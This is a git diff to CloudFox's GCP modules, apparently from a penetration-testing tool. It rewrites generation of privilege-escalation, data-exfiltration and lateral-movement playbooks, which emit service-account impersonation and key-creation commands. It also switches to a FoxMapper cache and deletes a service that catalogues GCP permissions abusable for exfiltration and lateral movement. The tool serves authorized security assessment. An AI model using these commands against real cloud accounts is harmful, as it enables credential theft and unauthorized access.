append(m.LateralMoveCapabilities, capability) } } @@ -1244,11 +1336,6 @@ func (m *WhoAmIModule) generateLoot() { if path.Confidence == "potential" { confidenceNote = "# NOTE: This is a POTENTIAL path based on role name. Actual exploitation depends on resource configuration.\n" } - // Use the stored command if available, otherwise generate one - exploitCmd := path.Command - if exploitCmd == "" { - exploitCmd = attackpathservice.GeneratePrivescCommand(path.Permission, path.ProjectID, path.ProjectID) - } m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( "## %s\n"+ "# %s\n"+ @@ -1264,12 +1351,13 @@ func (m *WhoAmIModule) generateLoot() { path.Confidence, path.RequiredPerms, confidenceNote, - exploitCmd, + path.Command, ) } // Data exfiltration capabilities loot for _, cap := range m.DataExfilCapabilities { + exfilCmd := generateExfilCommand(cap.Permission, cap.Category) m.LootMap["whoami-data-exfil"].Contents += fmt.Sprintf( "## %s\n"+ "# Category: %s\n"+ @@ -1282,12 +1370,13 @@ func (m *WhoAmIModule) generateLoot() { cap.Description, cap.SourceRole, cap.SourceScope, - attackpathservice.GenerateExfilCommand(cap.Permission, cap.ProjectID, cap.ProjectID), + exfilCmd, ) } // Lateral movement capabilities loot for _, cap := range m.LateralMoveCapabilities { + lateralCmd := generateLateralCommand(cap.Permission, cap.Category) m.LootMap["whoami-lateral-movement"].Contents += fmt.Sprintf( "## %s\n"+ "# Category: %s\n"+ @@ -1300,63 +1389,303 @@ func (m *WhoAmIModule) generateLoot() { cap.Description, cap.SourceRole, cap.SourceScope, - attackpathservice.GenerateLateralCommand(cap.Permission, cap.ProjectID, cap.ProjectID), + lateralCmd, ) } - // Generate playbooks using centralized attackpathService functions + // Generate playbooks based on FoxMapper findings m.generatePlaybooks() } } -// generatePlaybooks creates playbooks using the centralized attackpathService playbook functions +// generatePlaybooks creates detailed playbooks based on FoxMapper findings +// Uses the same visual path style as the foxmapper module func (m *WhoAmIModule) generatePlaybooks() { - // Convert PrivEscPaths to AttackPaths for the centralized function - var privescAttackPaths []attackpathservice.AttackPath - for _, path := range m.PrivEscPaths { - privescAttackPaths = append(privescAttackPaths, attackpathservice.AttackPath{ - Principal: m.Identity.Email, - PrincipalType: m.Identity.Type, - Method: path.Permission, - Category: path.Category, - Description: path.Description, - ScopeName: path.SourceScope, - ProjectID: path.ProjectID, - }) + // Privilege escalation playbook with detailed paths + m.LootMap["whoami-privesc-playbook"].Contents = m.generatePrivescPlaybook() + + // Data exfiltration playbook + m.LootMap["whoami-data-exfil-playbook"].Contents = m.generateDataExfilPlaybook() + + // Lateral movement playbook + m.LootMap["whoami-lateral-movement-playbook"].Contents = m.generateLateralPlaybook() +} + +// generatePrivescPlaybook creates a detailed privesc playbook with FoxMapper path visualization +func (m *WhoAmIModule) generatePrivescPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Privilege Escalation Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains privilege escalation paths identified by FoxMapper analysis.\n") + sb.WriteString("Paths show the escalation chain from your current identity to admin principals.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Findings with escalation paths: %d\n", len(m.FoxMapperPrivescFindings))) + + // Count total paths and by level + totalPaths := 0 + orgPaths := 0 + folderPaths := 0 + projectPaths := 0 + for _, finding := range m.FoxMapperPrivescFindings { + totalPaths += len(finding.Paths) + orgPaths += finding.PathsToOrgAdmin + folderPaths += finding.PathsToFolderAdmin + projectPaths += finding.PathsToProjectAdmin + } + sb.WriteString(fmt.Sprintf("Total escalation paths: %d\n", totalPaths)) + if orgPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Org Admin: %d\n", orgPaths)) + } + if folderPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Folder Admin: %d\n", folderPaths)) + } + if projectPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Project Admin: %d\n", projectPaths)) + } + sb.WriteString("\n") + + // If we have FoxMapper service and findings, show detailed paths + if m.FoxMapperService != nil && len(m.FoxMapperPrivescFindings) > 0 { + for _, finding := range m.FoxMapperPrivescFindings { + if len(finding.Paths) == 0 { + continue + } + + sb.WriteString("================================================================================\n") + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", finding.Principal, finding.MemberType)) + sb.WriteString(fmt.Sprintf("Highest reachable: %s admin\n", finding.HighestAdminLevel)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d (viable: %d, scope-blocked: %d)\n", + len(finding.Paths), finding.ViablePathCount, finding.ScopeBlockedCount)) + sb.WriteString("================================================================================\n\n") + + for pathIdx, path := range finding.Paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + sb.WriteString(" │\n") + + scopeWarning := "" + if edge.ScopeBlocksEscalation { + scopeWarning = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + scopeWarning = " ⚠️ scope-limited" + } + + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, scopeWarning)) + + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + if edge.Reason != "" && edge.Reason != edge.ShortReason { + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + if i < len(path.Edges)-1 { + sb.WriteString(" │\n") + sb.WriteString(" ▼\n") + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(" │\n") + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + } else if len(m.PrivEscPaths) > 0 { + // Fallback to simplified output if no FoxMapper findings + sb.WriteString("================================================================================\n") + sb.WriteString("ESCALATION PATHS (Summary)\n") + sb.WriteString("================================================================================\n\n") + + for i, path := range m.PrivEscPaths { + sb.WriteString(fmt.Sprintf("### Path %d: %s\n\n", i+1, path.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", path.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", path.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n", path.SourceRole, path.SourceScope)) + sb.WriteString(fmt.Sprintf("- Confidence: %s\n\n", path.Confidence)) + if path.Command != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", path.Command)) + } + } } - m.LootMap["whoami-privesc-playbook"].Contents = attackpathservice.GeneratePrivescPlaybook(privescAttackPaths, m.Identity.Email) - - // Convert DataExfilCapabilities to AttackPaths for the centralized function - var exfilAttackPaths []attackpathservice.AttackPath - for _, cap := range m.DataExfilCapabilities { - exfilAttackPaths = append(exfilAttackPaths, attackpathservice.AttackPath{ - Principal: m.Identity.Email, - PrincipalType: m.Identity.Type, - Method: cap.Permission, - Category: cap.Category, - RiskLevel: cap.RiskLevel, - Description: cap.Description, - ScopeName: cap.SourceScope, - ProjectID: cap.ProjectID, - }) + + // Add impersonation targets section if we have any + if len(m.ImpersonationTargets) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("IMPERSONATION TARGETS (Verified via IAM Policy)\n") + sb.WriteString("================================================================================\n\n") + + for _, target := range m.ImpersonationTargets { + sb.WriteString(fmt.Sprintf("Service Account: %s\n", target.ServiceAccount)) + sb.WriteString(fmt.Sprintf("Project: %s\n", target.ProjectID)) + if target.CanImpersonate { + sb.WriteString(" ✓ Can generate access tokens\n") + sb.WriteString(fmt.Sprintf(" gcloud auth print-access-token --impersonate-service-account=%s\n", target.ServiceAccount)) + } + if target.CanCreateKeys { + sb.WriteString(" ✓ Can create service account keys\n") + sb.WriteString(fmt.Sprintf(" gcloud iam service-accounts keys create key.json --iam-account=%s\n", target.ServiceAccount)) + } + if target.CanActAs { + sb.WriteString(" ✓ Can act as (use with compute, functions, etc.)\n") + } + sb.WriteString("\n") + } } - m.LootMap["whoami-data-exfil-playbook"].Contents = attackpathservice.GenerateExfilPlaybook(exfilAttackPaths, m.Identity.Email) - - // Convert LateralMoveCapabilities to AttackPaths for the centralized function - var lateralAttackPaths []attackpathservice.AttackPath - for _, cap := range m.LateralMoveCapabilities { - lateralAttackPaths = append(lateralAttackPaths, attackpathservice.AttackPath{ - Principal: m.Identity.Email, - PrincipalType: m.Identity.Type, - Method: cap.Permission, - Category: cap.Category, - RiskLevel: cap.RiskLevel, - Description: cap.Description, - ScopeName: cap.SourceScope, - ProjectID: cap.ProjectID, - }) + + return sb.String() +} + +// generateDataExfilPlaybook creates a detailed data exfil playbook +func (m *WhoAmIModule) generateDataExfilPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Data Exfiltration Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains data exfiltration capabilities identified by FoxMapper analysis.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Exfiltration techniques: %d\n", len(m.FoxMapperDataExfilFindings))) + sb.WriteString(fmt.Sprintf("Total capabilities: %d\n\n", len(m.DataExfilCapabilities))) + + // Group by service + if len(m.FoxMapperDataExfilFindings) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("DATA EXFILTRATION TECHNIQUES\n") + sb.WriteString("================================================================================\n\n") + + for _, finding := range m.FoxMapperDataExfilFindings { + sb.WriteString(fmt.Sprintf("--- %s: %s ---\n\n", strings.ToUpper(finding.Service), finding.Technique)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("Description: %s\n\n", finding.Description)) + + sb.WriteString("Principals with access:\n") + for _, principal := range finding.Principals { + adminStatus := "" + if principal.IsAdmin { + adminStatus = " (Admin)" + } + sb.WriteString(fmt.Sprintf(" • %s%s\n", principal.Principal, adminStatus)) + } + sb.WriteString("\n") + + sb.WriteString("Exploitation:\n") + sb.WriteString(fmt.Sprintf(" %s\n\n", finding.Exploitation)) + } + } else if len(m.DataExfilCapabilities) > 0 { + // Fallback + sb.WriteString("================================================================================\n") + sb.WriteString("CAPABILITIES\n") + sb.WriteString("================================================================================\n\n") + + for i, cap := range m.DataExfilCapabilities { + sb.WriteString(fmt.Sprintf("### Capability %d: %s\n\n", i+1, cap.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", cap.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", cap.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n\n", cap.SourceRole, cap.SourceScope)) + exfilCmd := generateExfilCommand(cap.Permission, cap.Category) + if exfilCmd != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", exfilCmd)) + } + } } - m.LootMap["whoami-lateral-movement-playbook"].Contents = attackpathservice.GenerateLateralPlaybook(lateralAttackPaths, m.Identity.Email) + + return sb.String() +} + +// generateLateralPlaybook creates a detailed lateral movement playbook +func (m *WhoAmIModule) generateLateralPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Lateral Movement Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains lateral movement capabilities identified by FoxMapper analysis.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Lateral movement techniques: %d\n", len(m.FoxMapperLateralFindings))) + sb.WriteString(fmt.Sprintf("Total capabilities: %d\n\n", len(m.LateralMoveCapabilities))) + + // Group by category + if len(m.FoxMapperLateralFindings) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("LATERAL MOVEMENT TECHNIQUES\n") + sb.WriteString("================================================================================\n\n") + + // Group by category + categories := make(map[string][]foxmapperservice.LateralFinding) + for _, finding := range m.FoxMapperLateralFindings { + categories[finding.Category] = append(categories[finding.Category], finding) + } + + for category, findings := range categories { + sb.WriteString(fmt.Sprintf("=== %s ===\n\n", strings.ToUpper(strings.ReplaceAll(category, "_", " ")))) + + for _, finding := range findings { + sb.WriteString(fmt.Sprintf("--- %s ---\n\n", finding.Technique)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("Description: %s\n\n", finding.Description)) + + sb.WriteString("Principals with access:\n") + for _, principal := range finding.Principals { + adminStatus := "" + if principal.IsAdmin { + adminStatus = " (Admin)" + } + sb.WriteString(fmt.Sprintf(" • %s%s\n", principal.Principal, adminStatus)) + } + sb.WriteString("\n") + + sb.WriteString("Exploitation:\n") + sb.WriteString(fmt.Sprintf(" %s\n\n", finding.Exploitation)) + } + } + } else if len(m.LateralMoveCapabilities) > 0 { + // Fallback + sb.WriteString("================================================================================\n") + sb.WriteString("CAPABILITIES\n") + sb.WriteString("================================================================================\n\n") + + for i, cap := range m.LateralMoveCapabilities { + sb.WriteString(fmt.Sprintf("### Capability %d: %s\n\n", i+1, cap.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", cap.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", cap.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n\n", cap.SourceRole, cap.SourceScope)) + lateralCmd := generateLateralCommand(cap.Permission, cap.Category) + if lateralCmd != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", lateralCmd)) + } + } + } + + return sb.String() } // ------------------------------ diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go index 13515d61..478b6fcb 100644 --- a/gcp/commands/workloadidentity.go +++ b/gcp/commands/workloadidentity.go @@ -75,7 +75,7 @@ type WorkloadIdentityModule struct { ProjectProviders map[string][]workloadidentityservice.WorkloadIdentityProvider // projectID -> providers ProjectFederatedBindings map[string][]workloadidentityservice.FederatedIdentityBinding // projectID -> federated bindings LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper cache for attack path analysis mu sync.Mutex } @@ -119,17 +119,10 @@ func runGCPWorkloadIdentityCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *WorkloadIdentityModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Get FoxMapper cache from context + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper cache for attack path analysis", globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME) } // Run enumeration with concurrency @@ -346,9 +339,9 @@ func (m *WorkloadIdentityModule) processProject(ctx context.Context, projectID s func (m *WorkloadIdentityModule) findWorkloadIdentityBindings(ctx context.Context, projectID, clusterName, location, workloadPool string, logger internal.Logger) []WorkloadIdentityBinding { var bindings []WorkloadIdentityBinding - // Get all service accounts in the project and check their IAM policies + // Get all service accounts in the project and check their IAM policies (without keys) iamSvc := IAMService.New() - serviceAccounts, err := iamSvc.ServiceAccounts(projectID) + serviceAccounts, err := iamSvc.ServiceAccountsBasic(projectID) if err != nil { gcpinternal.HandleGCPError(err, logger, globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, fmt.Sprintf("Could not list service accounts in project %s", projectID)) @@ -843,12 +836,7 @@ func (m *WorkloadIdentityModule) buildTables( } // Check attack paths for the GCP service account - attackPaths := "-" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(binding.GCPServiceAccount) - } else { - attackPaths = "run --attack-paths" - } + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, binding.GCPServiceAccount) bindingsBody = append(bindingsBody, []string{ m.GetProjectName(binding.ProjectID), @@ -961,12 +949,7 @@ func (m *WorkloadIdentityModule) buildTables( var fedBindingsBody [][]string for _, fb := range federatedBindings { // Check attack paths for the GCP service account - attackPaths := "-" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(fb.GCPServiceAccount) - } else { - attackPaths = "run --attack-paths" - } + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, fb.GCPServiceAccount) fedBindingsBody = append(fedBindingsBody, []string{ m.GetProjectName(fb.ProjectID), diff --git a/gcp/services/attackpathService/attackpathService.go b/gcp/services/attackpathService/attackpathService.go deleted file mode 100644 index 0d44ef71..00000000 --- a/gcp/services/attackpathService/attackpathService.go +++ /dev/null @@ -1,2930 +0,0 @@ -package attackpathservice - -import ( - "context" - "fmt" - "strings" - - iampb "cloud.google.com/go/iam/apiv1/iampb" - resourcemanager "cloud.google.com/go/resourcemanager/apiv3" - resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/BishopFox/cloudfox/internal/gcp/sdk" - crmv1 "google.golang.org/api/cloudresourcemanager/v1" - "google.golang.org/api/iam/v1" - "google.golang.org/api/iterator" - - // Resource-level IAM - "google.golang.org/api/bigquery/v2" - "google.golang.org/api/cloudkms/v1" - "google.golang.org/api/compute/v1" - run "google.golang.org/api/run/v1" - "google.golang.org/api/pubsub/v1" - "google.golang.org/api/secretmanager/v1" - "google.golang.org/api/spanner/v1" - "google.golang.org/api/storage/v1" - cloudfunctions "google.golang.org/api/cloudfunctions/v2" -) - -var logger = internal.NewLogger() - -// AttackPathService provides analysis for data exfiltration and lateral movement paths -type AttackPathService struct { - session *gcpinternal.SafeSession -} - -func New() *AttackPathService { - return &AttackPathService{} -} - -func NewWithSession(session *gcpinternal.SafeSession) *AttackPathService { - return &AttackPathService{session: session} -} - -// getIAMService returns an IAM service using cached session if available -func (s *AttackPathService) getIAMService(ctx context.Context) (*iam.Service, error) { - if s.session != nil { - return sdk.CachedGetIAMService(ctx, s.session) - } - return iam.NewService(ctx) -} - -// getResourceManagerService returns a Resource Manager service using cached session if available -func (s *AttackPathService) getResourceManagerService(ctx context.Context) (*crmv1.Service, error) { - if s.session != nil { - return sdk.CachedGetResourceManagerService(ctx, s.session) - } - return crmv1.NewService(ctx) -} - -// getStorageService returns a Storage service using cached session if available -func (s *AttackPathService) getStorageService(ctx context.Context) (*storage.Service, error) { - if s.session != nil { - return sdk.CachedGetStorageService(ctx, s.session) - } - return storage.NewService(ctx) -} - -// getBigQueryService returns a BigQuery service using cached session if available -func (s *AttackPathService) getBigQueryService(ctx context.Context) (*bigquery.Service, error) { - if s.session != nil { - return sdk.CachedGetBigQueryService(ctx, s.session) - } - return bigquery.NewService(ctx) -} - -// getComputeService returns a Compute service using cached session if available -func (s *AttackPathService) getComputeService(ctx context.Context) (*compute.Service, error) { - if s.session != nil { - return sdk.CachedGetComputeService(ctx, s.session) - } - return compute.NewService(ctx) -} - -// getSecretManagerService returns a Secret Manager service -func (s *AttackPathService) getSecretManagerService(ctx context.Context) (*secretmanager.Service, error) { - if s.session != nil { - return sdk.CachedGetSecretManagerService(ctx, s.session) - } - return secretmanager.NewService(ctx) -} - -// getCloudFunctionsService returns a Cloud Functions v2 service -func (s *AttackPathService) getCloudFunctionsService(ctx context.Context) (*cloudfunctions.Service, error) { - if s.session != nil { - return sdk.CachedGetCloudFunctionsServiceV2(ctx, s.session) - } - return cloudfunctions.NewService(ctx) -} - -// getCloudRunService returns a Cloud Run service -func (s *AttackPathService) getCloudRunService(ctx context.Context) (*run.APIService, error) { - if s.session != nil { - return sdk.CachedGetCloudRunService(ctx, s.session) - } - return run.NewService(ctx) -} - -// getKMSService returns a KMS service -func (s *AttackPathService) getKMSService(ctx context.Context) (*cloudkms.Service, error) { - if s.session != nil { - return sdk.CachedGetKMSService(ctx, s.session) - } - return cloudkms.NewService(ctx) -} - -// getPubSubService returns a Pub/Sub service -func (s *AttackPathService) getPubSubService(ctx context.Context) (*pubsub.Service, error) { - if s.session != nil { - return sdk.CachedGetPubSubService(ctx, s.session) - } - return pubsub.NewService(ctx) -} - -// getSpannerService returns a Spanner service -func (s *AttackPathService) getSpannerService(ctx context.Context) (*spanner.Service, error) { - if s.session != nil { - return sdk.CachedGetSpannerService(ctx, s.session) - } - return spanner.NewService(ctx) -} - -// DataExfilPermission represents a permission that enables data exfiltration -type DataExfilPermission struct { - Permission string `json:"permission"` - Category string `json:"category"` - RiskLevel string `json:"riskLevel"` - Description string `json:"description"` -} - -// LateralMovementPermission represents a permission that enables lateral movement -type LateralMovementPermission struct { - Permission string `json:"permission"` - Category string `json:"category"` - RiskLevel string `json:"riskLevel"` - Description string `json:"description"` -} - -// PrivescPermission represents a permission that enables privilege escalation -type PrivescPermission struct { - Permission string `json:"permission"` - Category string `json:"category"` - RiskLevel string `json:"riskLevel"` - Description string `json:"description"` -} - -// AttackPath represents an attack path (exfil, lateral, or privesc) -type AttackPath struct { - Principal string `json:"principal"` - PrincipalType string `json:"principalType"` - Method string `json:"method"` - TargetResource string `json:"targetResource"` - Permissions []string `json:"permissions"` - Category string `json:"category"` - RiskLevel string `json:"riskLevel"` - Description string `json:"description"` - ExploitCommand string `json:"exploitCommand"` - ProjectID string `json:"projectId"` - ScopeType string `json:"scopeType"` // organization, folder, project, resource - ScopeID string `json:"scopeId"` - ScopeName string `json:"scopeName"` - PathType string `json:"pathType"` // "exfil", "lateral", or "privesc" -} - -// CombinedAttackPathData holds all attack paths across org/folder/project/resource levels -type CombinedAttackPathData struct { - OrgPaths []AttackPath `json:"orgPaths"` - FolderPaths []AttackPath `json:"folderPaths"` - ProjectPaths []AttackPath `json:"projectPaths"` - ResourcePaths []AttackPath `json:"resourcePaths"` - AllPaths []AttackPath `json:"allPaths"` - OrgNames map[string]string `json:"orgNames"` - FolderNames map[string]string `json:"folderNames"` - OrgIDs []string `json:"orgIds"` -} - -// GetDataExfilPermissions returns permissions that enable data exfiltration -func GetDataExfilPermissions() []DataExfilPermission { - return []DataExfilPermission{ - // Compute Exports - {Permission: "compute.images.create", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create VM images from disks for external export"}, - {Permission: "compute.snapshots.create", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create disk snapshots for external export"}, - {Permission: "compute.disks.createSnapshot", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create snapshots from specific disks"}, - {Permission: "compute.machineImages.create", Category: "Compute Export", RiskLevel: "HIGH", Description: "Create machine images including disk data"}, - - // Logging Sinks - {Permission: "logging.sinks.create", Category: "Logging", RiskLevel: "HIGH", Description: "Create logging sinks to export logs externally"}, - {Permission: "logging.sinks.update", Category: "Logging", RiskLevel: "HIGH", Description: "Modify logging sinks to redirect to external destinations"}, - - // Cloud SQL - {Permission: "cloudsql.backups.create", Category: "Database", RiskLevel: "HIGH", Description: "Create Cloud SQL backups for export"}, - {Permission: "cloudsql.instances.export", Category: "Database", RiskLevel: "CRITICAL", Description: "Export Cloud SQL data to GCS"}, - - // Pub/Sub - {Permission: "pubsub.subscriptions.create", Category: "Messaging", RiskLevel: "HIGH", Description: "Create subscriptions to intercept messages"}, - {Permission: "pubsub.subscriptions.consume", Category: "Messaging", RiskLevel: "MEDIUM", Description: "Pull messages from subscriptions"}, - {Permission: "pubsub.subscriptions.update", Category: "Messaging", RiskLevel: "HIGH", Description: "Modify subscription push endpoints"}, - - // BigQuery - {Permission: "bigquery.tables.export", Category: "BigQuery", RiskLevel: "CRITICAL", Description: "Export BigQuery tables to GCS"}, - {Permission: "bigquery.tables.getData", Category: "BigQuery", RiskLevel: "HIGH", Description: "Read data from BigQuery tables"}, - {Permission: "bigquery.jobs.create", Category: "BigQuery", RiskLevel: "MEDIUM", Description: "Run queries and extract data"}, - - // Storage - {Permission: "storage.objects.get", Category: "Storage", RiskLevel: "HIGH", Description: "Download objects from GCS buckets"}, - {Permission: "storage.objects.list", Category: "Storage", RiskLevel: "MEDIUM", Description: "List objects to identify sensitive data"}, - - // Storage Transfer - {Permission: "storagetransfer.jobs.create", Category: "Storage Transfer", RiskLevel: "CRITICAL", Description: "Create transfer jobs to external clouds"}, - {Permission: "storagetransfer.jobs.update", Category: "Storage Transfer", RiskLevel: "HIGH", Description: "Modify transfer jobs to external destinations"}, - - // Spanner - {Permission: "spanner.databases.export", Category: "Database", RiskLevel: "CRITICAL", Description: "Export Spanner databases to GCS"}, - {Permission: "spanner.databases.read", Category: "Database", RiskLevel: "HIGH", Description: "Read data from Spanner databases"}, - - // Firestore/Datastore - {Permission: "datastore.databases.export", Category: "Database", RiskLevel: "CRITICAL", Description: "Export Firestore/Datastore data to GCS"}, - {Permission: "datastore.entities.get", Category: "Database", RiskLevel: "HIGH", Description: "Read Firestore/Datastore entities"}, - - // Bigtable - {Permission: "bigtable.tables.readRows", Category: "Database", RiskLevel: "HIGH", Description: "Read data from Bigtable tables"}, - - // Secrets - {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "CRITICAL", Description: "Access secret values (API keys, credentials)"}, - - // KMS - {Permission: "cloudkms.cryptoKeyVersions.useToDecrypt", Category: "Encryption", RiskLevel: "HIGH", Description: "Decrypt encrypted data for exfiltration"}, - } -} - -// GetLateralMovementPermissions returns permissions that enable lateral movement -func GetLateralMovementPermissions() []LateralMovementPermission { - return []LateralMovementPermission{ - // VPC Peering - {Permission: "compute.networks.addPeering", Category: "Network", RiskLevel: "CRITICAL", Description: "Create VPC peering to access resources in other projects"}, - {Permission: "compute.networks.updatePeering", Category: "Network", RiskLevel: "HIGH", Description: "Modify VPC peering configurations"}, - {Permission: "compute.networks.removePeering", Category: "Network", RiskLevel: "MEDIUM", Description: "Remove VPC peering (disruptive)"}, - - // Service Networking - {Permission: "servicenetworking.services.addPeering", Category: "Network", RiskLevel: "HIGH", Description: "Enable private service access to shared networks"}, - - // Shared VPC - {Permission: "compute.subnetworks.use", Category: "Shared VPC", RiskLevel: "HIGH", Description: "Use shared VPC subnets in other projects"}, - {Permission: "compute.subnetworks.setPrivateIpGoogleAccess", Category: "Shared VPC", RiskLevel: "MEDIUM", Description: "Modify private Google access settings"}, - - // Image/Snapshot IAM - {Permission: "compute.images.setIamPolicy", Category: "Compute Sharing", RiskLevel: "HIGH", Description: "Share VM images with external projects"}, - {Permission: "compute.snapshots.setIamPolicy", Category: "Compute Sharing", RiskLevel: "HIGH", Description: "Share disk snapshots with external projects"}, - {Permission: "compute.machineImages.setIamPolicy", Category: "Compute Sharing", RiskLevel: "HIGH", Description: "Share machine images with external projects"}, - - // SA Impersonation - {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate tokens for SAs in other projects"}, - {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign as SAs in other projects"}, - - // GKE - {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get credentials for GKE clusters"}, - {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Execute commands in pods"}, - {Permission: "container.pods.portForward", Category: "GKE", RiskLevel: "HIGH", Description: "Port forward to pods"}, - - // Compute Access - {Permission: "compute.instances.osLogin", Category: "Compute Access", RiskLevel: "HIGH", Description: "SSH into instances via OS Login"}, - {Permission: "compute.instances.osAdminLogin", Category: "Compute Access", RiskLevel: "CRITICAL", Description: "SSH with sudo via OS Login"}, - {Permission: "compute.instances.setMetadata", Category: "Compute Access", RiskLevel: "HIGH", Description: "Add SSH keys via metadata"}, - {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute Access", RiskLevel: "CRITICAL", Description: "Add SSH keys project-wide"}, - - // Cloud SQL - {Permission: "cloudsql.instances.connect", Category: "Database Access", RiskLevel: "HIGH", Description: "Connect to Cloud SQL instances"}, - {Permission: "cloudsql.users.create", Category: "Database Access", RiskLevel: "HIGH", Description: "Create database users"}, - - // VPN/Interconnect - {Permission: "compute.vpnTunnels.create", Category: "Network", RiskLevel: "HIGH", Description: "Create VPN tunnels to external networks"}, - {Permission: "compute.interconnects.create", Category: "Network", RiskLevel: "CRITICAL", Description: "Create dedicated interconnects"}, - {Permission: "compute.routers.update", Category: "Network", RiskLevel: "HIGH", Description: "Modify Cloud Router for traffic redirection"}, - - // Firewall - 